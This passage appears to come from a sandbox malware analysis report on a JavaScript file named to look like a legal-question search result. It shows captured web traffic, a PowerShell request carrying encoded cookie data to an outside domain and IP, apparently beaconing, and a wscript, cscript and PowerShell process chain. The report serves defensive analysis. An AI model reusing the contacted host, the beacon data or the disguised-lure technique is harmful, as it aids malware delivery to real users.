                                                                                        2024-05-06 18:43:11 UTC1369INData Raw: 29 2c 6f 3d 28 61 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74 28 61 2c 65 2c 6e 29 7d 29 2c 6f 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f 3d 22 77 70 45 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22
                                                                                        Data Ascii: ),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag"
                                                                                        2024-05-06 18:43:11 UTC1369INData Raw: 67 45 78 63 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 7c 7c 28 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 2c 28 65 3d 6e 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65
                                                                                        Data Ascii: gExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twe
                                                                                        2024-05-06 18:43:11 UTC1369INData Raw: 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 65 6d 62 65 64 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 61 36 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 65 6d 62 65 64 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 61 36 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 20 66 69 67 63 61 70 74 69 6f
                                                                                        Data Ascii: text-align:center}.is-dark-theme .wp-block-embed figcaption{color:#ffffffa6}.wp-block-embed{margin:0 0 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaptio
                                                                                        2024-05-06 18:43:11 UTC1369INData Raw: 2d 73 65 70 61 72 61 74 6f 72 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 2d 61 6c 70 68 61 2d 63 68 61 6e 6e 65 6c 2d 6f 70 61 63 69 74 79 7b 6f 70 61 63 69 74 79 3a 31 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 3a 6e 6f 74 28 2e 69 73 2d 73 74 79 6c 65 2d 77 69 64 65 29 3a 6e 6f 74 28 2e 69 73 2d 73 74 79 6c 65 2d 64 6f 74 73 29 7b 77 69 64 74 68 3a 31 30 30 70 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 74 28 2e 69 73 2d 73 74
                                                                                        Data Ascii: -separator{border:none;border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-st
                                                                                        2024-05-06 18:43:11 UTC1369INData Raw: 70 65 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 3a 35 70 78 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 6a 65 74 70 61 63 6b 2d 73 68 61 72 69 6e 67 2d 62 75 74 74 6f 6e 73 5f 5f 73 65 72 76 69 63 65 73 2d 6c 69 73 74 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 7d 2e 6a 65 74 70 61 63 6b 2d 73 68 61 72 69 6e 67 2d 62 75 74 74 6f 6e 73 5f 5f 73 65 72 76 69 63 65 73 2d 6c 69 73 74 2e 68 61 73 2d 6e 6f 72 6d 61 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 6a 65 74 70 61 63 6b 2d 73 68 61 72 69 6e 67 2d 62 75 74 74 6f 6e 73 5f 5f 73 65 72 76 69 63 65 73 2d 6c 69 73 74 2e 68 61 73 2d 6c 61 72 67 65 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 7d
                                                                                        Data Ascii: pe:none;margin:5px;padding:0}.jetpack-sharing-buttons__services-list.has-small-icon-size{font-size:12px}.jetpack-sharing-buttons__services-list.has-normal-icon-size{font-size:16px}.jetpack-sharing-buttons__services-list.has-large-icon-size{font-size:24px}
                                                                                        2024-05-06 18:43:11 UTC1369INData Raw: 6f 72 2d 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 3a 20 23 30 30 64 30 38 34 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 38 65 64 31 66 63 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 30 36 39 33 65 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 23 39 62 35 31 65 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 2d 74 6f 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 36 2c 31 34 37 2c
                                                                                        Data Ascii: or--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.54971346.38.249.1484436776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-05-06 18:43:10 UTC2358OUTGET / HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                                                                        Cookie: 9283A9EB0C=c2FsmXec0dAfiwgAAAAAAAQAjVTRbpswFP0V87ZJG2qTCEXLkwMm8YQxsiHpAyJiiVMhAUZA11bi42eTsJClSvcAwuece7n3+tjQ8yKOGA8YdbGHEvtHHNTyuU4LJ23TzoBB4MAQajxqRN3EaX6UZRPDqtKCmMm0yMrnzrBlUcjyHOtmuWhGuUAPxCfNafFRxJe3ufX1Jgz08L3grTWbTj79HSVBFCLmQ4IS6LnU598Du8/EK7HX4dusPMjXJm7em1YU00m8Lw6meBOd4dTZb1Hrjsc6PuhOdBNfZJ2xpgQ5DG/0TE+rAIbr5GqMneFRG3qfDdmT+zTX2pUqGrENYkkcj1rwI7JEbEfdndpGG3FOGU8mnUFL0Vd0k3gglIQn5252ftgZukT0FCammtbCRE9oYS5huDBt4izMzZLrl8J+cv2ojy139Wu9MAm3lSzwVI6hhh1k9hqHyA4jpkZOHGs2ZrGD/BC7WHWDy1bk1gy4ykz5O7AAkQeRg8fZFPBWVJVyGJh/AytRvmSl6NXjTB7aIC+xxhBDG8wx9ZP58WGuiIunbyx+17PX9D2D/lV+7EZFR0sP25e9CF5+5dm+M04uGjZqWDMp25HXOiNEJLjvkDgURaWE/6nT596hBGJ/fBwu6I5RSLC/Gq6Gf0T9ORpsrIHRFXLt8VfVQlZfNUP5luCEZPtaNvLYgjMBHh+AmtofcdKQ35UEAACfE4SD7DMR9w==; 9283A9EB0C1=c2FsmXec0dAfiwgAAAAAAAQAZZBBbsMgEEWvUi7QO7hpomYRJbUjeY3w2EEGBs2MHafi8IXQdlOxmA/8efyhidFZo8ViOJD28IEsSellsDhMSTWb/ppdz3P/eQ6gm0N7MFtSBsPtaTRsyManIOZcZPQYkho0V9LgXHUOd58UbNEhASU1YpCB1np3HBwk5VgXxAk80uNlhz4SMNuCO4+jNbDLSecrtks+iXgH4hs4l1QLk2WhR1ZLEOvhjXAuj3Sgydy [TRUNCATED]
                                                                                        Host: www.xn--operation-wstenfuchs-zec.de
                                                                                        Connection: Close
                                                                                        2024-05-06 18:43:11 UTC168INHTTP/1.1 500 Internal Server Error
                                                                                        Server: nginx
                                                                                        Date: Mon, 06 May 2024 18:43:11 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Content-Length: 0
                                                                                        Connection: close


                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        General

                                                                                        Target ID:0
                                                                                        Start time:20:41:14
                                                                                        Start date:06/05/2024
                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\does virginia have a no chase law for motorcycles 62848.js"
                                                                                        Imagebase:0x7ff6484e0000
                                                                                        File size:170'496 bytes
                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:4
                                                                                        Start time:20:42:09
                                                                                        Start date:06/05/2024
                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\wscript.EXE SOCIOL~1.JS
                                                                                        Imagebase:0x7ff6484e0000
                                                                                        File size:170'496 bytes
                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:5
                                                                                        Start time:20:42:27
                                                                                        Start date:06/05/2024
                                                                                        Path:C:\Windows\System32\cscript.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\cscript.exe" "SOCIOL~1.JS"
                                                                                        Imagebase:0x7ff7089c0000
                                                                                        File size:161'280 bytes
                                                                                        MD5 hash:24590BF74BBBBFD7D7AC070F4E3C44FD
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:6
                                                                                        Start time:20:42:27
                                                                                        Start date:06/05/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6d64d0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:7
                                                                                        Start time:20:42:34
                                                                                        Start date:06/05/2024
                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\wscript.EXE SOCIOL~1.JS
                                                                                        Imagebase:0x7ff6484e0000
                                                                                        File size:170'496 bytes
                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:8
                                                                                        Start time:20:42:43
                                                                                        Start date:06/05/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:powershell
                                                                                        Imagebase:0x7ff7be880000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:9
                                                                                        Start time:20:42:51
                                                                                        Start date:06/05/2024
                                                                                        Path:C:\Windows\System32\cscript.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\cscript.exe" "SOCIOL~1.JS"
                                                                                        Imagebase:0x7ff7089c0000
                                                                                        File size:161'280 bytes
                                                                                        MD5 hash:24590BF74BBBBFD7D7AC070F4E3C44FD
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:10
                                                                                        Start time:20:42:51
                                                                                        Start date:06/05/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6d64d0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:11
                                                                                        Start time:20:43:05
                                                                                        Start date:06/05/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:powershell
                                                                                        Imagebase:0x7ff7be880000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Disassembly

                                                                                        No disassembly